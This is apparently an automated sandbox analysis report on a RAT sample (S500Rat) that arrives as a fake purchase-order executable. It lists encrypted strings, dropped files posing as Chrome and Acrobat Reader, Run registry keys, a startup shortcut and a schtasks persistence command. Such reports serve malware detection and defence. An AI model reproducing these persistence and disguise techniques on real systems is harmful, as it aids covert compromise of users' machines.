                        Source: NRHRAS.exe.0.dr, ?????????????/?????????????.csBase64 encoded string: 'z6iuIdVp0vAss3FMQAab5wDNhcNqmr6iGF4HJb1DP1Fg7lFEHfHjtGN1j7psrcnp7Gi1AlABS+7Oi2npct7Jxwoecd7zhFwMFi9W3ix4L5LOHOqQfMQoZNSRbWkgFOTL9NQaeUr4tIXOg24zYHNx9KqlywexOlTtieKFwsNtRl9bXY2TXKrpVjUtAvk9vf9wA5pAIiuDgtsoPXH2Y3uIE7wk+mafvKNRvz8EICOufpTqO4gbTS3Rt1sfK1wttciL1N/mLnwAFuKRPP880AbsTwEk4yoTSpsWL1of/adIVZ34ZIOOTjdk0D6aGniiU4KxQpwrWoZvkG5MW6c3MjOr7x0BqeW6HKCV+2VKQRUi/Z9R3cIr6vaGUDdseBcTz+3yx/Rm4iKdFPalM5U8KcEUvKKBNyUyYQlkhRORRn0RgApFesXxfIe17nFAW4nPpBKBUAnfEAE4aWnPuBi5RHPTI4sXR5vxWjcMQvJoEXpnSYDGtEe+Nkz+C1Mu1z0Japo4GBtCzrb0Eewi+3ytWowPILudWCSXyl6wWtOR7H/Opqr6ofRRsujktcnLRcAJoJN4FidamxXA6DTuJUsC/dlfPHCmaku8rmvQjqwbUsGV87CUNX60aBr5am6u3FX+AHSGR0ndy4CX/GRDj1wADNKheSDdTx5ppy5L5FQgC7lI4yk7pj30EduVeYpwajIFKFhU9+k4J4Hshxjn0xViW+Q248i/5osf+GNrTHcqQwnb5Iw/247Ub5zuZuqxcmPg4w8VovjuPuMuGq6OuP7BHZ+zESYophKlp78bSd0ZUrrfzl1grE61Dk0hgGr6ukSUxHgsMKoX+1EKYNK5BNnZh8NJmz/1jZDPEBniirO5b35olCJTPc4qPrcS1iWwJP2atyz8YUvSz0JyrL/HTOaC+QnXtA==', '+nu68HhRkx9EKJfwEQk1ZPFfjBfKq5GqGnxs0+zohzcvjDLOI/ZSFEO54LBER3Fu6KPlqAgwo20vwKr8xLima6KX/KrBA8nz/iPlZUShJ+MSFdxA9sVlgdb3K7Z8QvinqKDxE7fEaQ2RIri2ifqSuUV0UriyaLFIHyULPoExT5htCEsd0Xque8N+7eAsqntk9JfqQVU9PhXZNT/qvnR47yT/bPFWjBgXqjeW3SvB42J+y/ARG7rdlZc1uTeqPzWr+nWWTwRy7sJgceXNHvMdREXDwpowQIqDZ15wNXoc0jUsn/KpVjlfNZGNOz52sKNHiPFVw7Vi7kfVERTbHWj2nJlHA7losMnqeKwJL3aA2XS5a2qQs458cVvWbqwFj8cmMp/HTopfrRlizBeeXJ8vsUu5PQOtpjAxnAbeS8inUF7xnz1ymT7bSqx8/nDItLS8T9kxLEFbwWX4tnzOqtnNMlfvrqLIlbs/ZVMckCCL6YDebIIaHHYTKfmsnpKQDaLbAYyKnl3I9DTRniPyULw8NZ5MhfTeNCe2SO4Ni7ukxij/26Zdvl/d3HA+R4nXqnXW1gSnsdHXDdAQ4XljUMp/+N9hrUXKOz4r4KzR/ggxupEBmpkrGZrCwasyMmANnJV3Nuw20DWNxh5vuP4FFuJD07Zp2/RJhA4pQ9ZzNTPYlFaaqmN+hcRYMArvYZzpLl0FWmDLvLqkGwbb79hWoPuZ/ujGL6bDu2KUB8yF593Z6dmrgl7qI42WkVx+e5W6Py9yXQLYLuSVXdTGtHrffuMWHzClKq1SdNZa8Vhjk1zd1uhGGh5QxIPaVPiAYLFHcDeSzsdE3CaYiVsCQc1gdpsROBN3I6Ydu+4S3RgObuCI62EvoCx5mX5nDyPou437qn0nuJI0/0GPj8Aqbi9VCHeWvirTWSZMu3DydVwicEjCxqZAjT2w3QFZqOCvok9jL5SU2OAohX1FIc4qIZAcaCru7A6ciYKViCwebpyjTx/k/s1TZIhRWKvopSusvPaVMoVcCdb2Z4j+HMOKfhr+yyApzCwkC80TghSp6SJ8g7qFVmDcP4GrjqhCH5nFmezM5c4iyINcaBeGlZ/ZFW9V2l26VjppAPQwi3M4mgmHJX/Aa6RoF1TpvzZzU0coRjZCEDWs+IFZtUERk5/pq7fS7s8RTzd57vMg7JmgKcVi7JGwjYRlDaPILcHo2VTjw3HVrgRS4OeN8g/Q0I5+CuoFu3nS7fSebxpV2VW7ifsor4AKMO0lAB8FnG9XYAoldSOpBSnQadk5Bj/nLHljW0DQ38fGnzkZDiuOmPQcR8dZppoz3FptH0IUBt54DnnR1Of/616tX6CpMKBT1c/nonn+/28DTEbIlrlJziWc+TLc+BHuP9Vi3UHcdtk+d+dmfusMAhnBQkZ1iqMtHlXasxGz8NqxaJiukZPfni/4kVKW8uAbARnTgoQl2Vq52iWWR+p4aN9hKdohMUz9B0YLPbCxrIolN0mJHMs1B3UTkeCHfe2jeIrW1OfPw+EfD2dJog7YB2Qr/biUvKAwlsKZkg0L0G9m4xSVxPSRoDEilPzqnfZIadKI9AVGZ5LqekV48UJfH6V5kR3vyEMkbKPPyQkLMwtOaZ+5O+TO0zX2PEPiCOGwollRLgtdwUtzVZu8slo2gCJek3Zm9daRpUYRN7DzICQk7+a55tcieWs46h/oKlfmnGuQTRxUt+pBmIQIJ8xRbVlZQu1x0hNrixsyLAe0lk0XSTd4SwIGIFdT2aRVe698wWzCWqniqscLbRfC6uqcP3GpcEs0pWXlLrhUuHnzG2gtybUZcjNDHOVh8Z/JSVKf9QtO8m56k29/IxVnyx6JJxqWTdNwRVOus1v0UbA9t0Bglt1TEnkZJItsGSQIkQ+Y9t9GHAc6PHRbHy9M2z+JVd2DE+33uV1LaFN6LcT3xfeMAMYer6JbAg1KgjjhgUjPRN2dWPIZIzh4gexR+9f2/OjQo6q6ZvUqAvxmp/+METLy1SnpFSgo/wPZhFHr9K/Y1DUjpHXOdVNdTN49OZt5OHLPbObn+jaQzunVZyMtUE8VZz2pqGB
                        Source: Chrome.exe.1.dr, ?????????????/?????????????.csBase64 encoded string: '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
                        Source: Chrome.exe.1.dr, ?????????????/??????????????.csBase64 encoded string: 'NWf0xXxBMNym1T7i6t/rNiVGMNUi3ntP1NYCKx/6SP0jLk+Qbv2/EzhRQifmDLANbovHuNBu7tAqJk7pZtu24A==', 'ozJ8moiZWQPZbcXwvtMmwZ1qbMfRagRa9net3q+Fj6+EXNoM4L1jbbNGObbGq6naklxC0DGON6P6s5BDn/LoxBZCkCgDGhgIyxRw+bPZyNxXEzPtgfb+6uOGRsXIMwf+Q9gDHboo29GRybsUfyg+LaCs1l9/PW49nVwXf9VkINEUSxBTM8S3lpns68sSca7sZ4KWBQ+y0X5kZatAYPgnNq8WdiqwtCMSaqFHPo9rX0bH3Wpl89kyo0rzJb5QY1POxd228gXHMvw6i727dLv4l9Urk/aZPjaEo8vEi569l8m8hqhYVs7xabHzxkoDupAvTBCVZeQjB+h++HvDnssTyA=='
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/?????????????.csBase64 encoded string: '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
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/??????????????.csBase64 encoded string: 'NWf0xXxBMNym1T7i6t/rNiVGMNUi3ntP1NYCKx/6SP0jLk+Qbv2/EzhRQifmDLANbovHuNBu7tAqJk7pZtu24A==', 'ozJ8moiZWQPZbcXwvtMmwZ1qbMfRagRa9net3q+Fj6+EXNoM4L1jbbNGObbGq6naklxC0DGON6P6s5BDn/LoxBZCkCgDGhgIyxRw+bPZyNxXEzPtgfb+6uOGRsXIMwf+Q9gDHboo29GRybsUfyg+LaCs1l9/PW49nVwXf9VkINEUSxBTM8S3lpns68sSca7sZ4KWBQ+y0X5kZatAYPgnNq8WdiqwtCMSaqFHPo9rX0bH3Wpl89kyo0rzJb5QY1POxd228gXHMvw6i727dLv4l9Urk/aZPjaEo8vEi569l8m8hqhYVs7xabHzxkoDupAvTBCVZeQjB+h++HvDnssTyA=='
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5996:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2028:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4220:120:WilError_01
                        Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exeMutant created: \Sessions\1\BaseNamedObjects\S500Mutex_YMXBWEGOQS
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3420:120:WilError_01
                        Source: NRHRAS.exe.0.dr, ?????????????/???????????.csCryptographic APIs: 'CreateDecryptor'
                        Source: Chrome.exe.1.dr, ?????????????/???????????.csCryptographic APIs: 'CreateDecryptor'
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/???????????.csCryptographic APIs: 'CreateDecryptor'
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeStatic file information: File size 1382294 > 1048576

                        Data Obfuscation

                        barindex
                        .NET source code contains potential unpacker
                        Source: NRHRAS.exe.0.dr, ?????????????/???????????.cs.Net Code: ?????????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                        Source: Chrome.exe.1.dr, ?????????????/???????????.cs.Net Code: ?????????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                        Source: 1.0.NRHRAS.exe.2f0000.0.unpack, ?????????????/???????????.cs.Net Code: ?????????? System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00416CB5 push ecx; ret 10_2_00416CC8
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_00416CB5 push ecx; ret 12_2_00416CC8
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_0040EBD0 LoadLibraryA,GetProcAddress,10_2_0040EBD0
                        Source: #U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeStatic PE information: real checksum: 0xa961f should be: 0x1580b2
                        Source: Acrobat Reader DC.exe.0.drStatic PE information: real checksum: 0xa961f should be: 0x1580b2
                        Source: NRHRAS.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x1bd48
                        Source: Chrome.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x1bd48

                        Persistence and Installation Behavior

                        barindex
                        Uses cmd line tools excessively to alter registry or file data
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: attrib.exe
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: attrib.exe
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: attrib.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess created: attrib.exeJump to behavior
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeFile created: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeJump to dropped file
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeFile created: C:\Users\user\AppData\Local\Temp\NRHRAS.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeFile created: C:\Users\user\AppData\Roaming\Stub\Chrome.exeJump to dropped file

                        Boot Survival

                        barindex
                        Yara detected S500Rat
                        Source: Yara matchFile source: 1.2.NRHRAS.exe.2cda580.1.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.0.NRHRAS.exe.2f0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.NRHRAS.exe.2cda580.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.321313528.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000000.238959755.00000000002F2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: NRHRAS.exe PID: 5576, type: MEMORYSTR
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe, type: DROPPED
                        Creates multiple autostart registry keys
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run UALDJTJump to behavior
                        Uses schtasks.exe or at.exe to add and modify task schedules
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UALDJT.lnkJump to behavior
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UALDJT.lnkJump to behavior
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run UALDJTJump to behavior
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run UALDJTJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run NULLJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 10_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,10_2_00434418
                        Source: C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exeCode function: 12_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,12_2_00434418
                        Source: C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
